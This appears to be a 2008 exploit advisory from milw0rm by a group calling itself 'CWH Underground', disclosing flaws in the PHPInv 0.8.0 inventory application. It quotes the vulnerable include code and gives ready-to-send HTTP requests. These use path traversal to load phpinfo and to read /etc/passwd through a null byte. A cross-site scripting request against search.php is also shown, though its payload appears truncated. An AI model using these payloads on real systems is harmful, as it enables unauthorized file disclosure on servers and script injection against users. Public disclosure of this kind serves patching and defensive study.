========================================================= PHPInv 0.8.0 (LFI/XSS) Multiple Remote Vulnerabilities ========================================================= ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 8 June 2008 SITE : www.citec.us ##################################################### APPLICATION : PHPInv VERSION : 0.8.0 DOWNLOAD : http://sourceforge.net/projects/phpinv ##################################################### ---LFI--- ############################################## Vulnerable: entry.php (?action=) 43: if (isset($action) & !isset($noconfirm)) { 44: include("inc/entry_$action.php"); 45: } ############################################### ---Description--- Use Web Proxy (Web Scarab, Burb Proxy, etc...) to intercept URI -> http://[target]/[phpinv_path]/entry.php?hash=19e9abf204087d0765f81c5bfb1a6fef&categoryid=1&orderby=10&action=test Then You can change detail in GET request for this URI, Example [-]GET http://192.168.1.103:80/phpinv/entry.php?hash=19e9abf204087d0765f81c5bfb1a6fef&categoryid=1&orderby=10&action=/../../../../../phpinfo HTTP/1.1 [-]Accept: */* [-]User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) [-]Host: 192.168.1.103 [-]Connection: Close [-]Pragma: no-cache Now you can see phpinfo.php in PHPInv page... :) Tip!! http://192.168.1.103:80/phpinv/entry.php?hash=19e9abf204087d0765f81c5bfb1a6fef&categoryid=1&orderby=10&action=/../../../../../etc/passwd%00 HTTP/1.1 ---XSS--- [+]search.php (keyword) GET http://192.168.1.103:80/phpinv/search.php?hash=19e9abf204087d0765f81c5bfb1a6fef&keyword=>">&categoryid=1&action=Search HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: 192.168.1.103 Connection: Close Pragma: no-cache ################################################################## # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## # milw0rm.com [2008-06-08]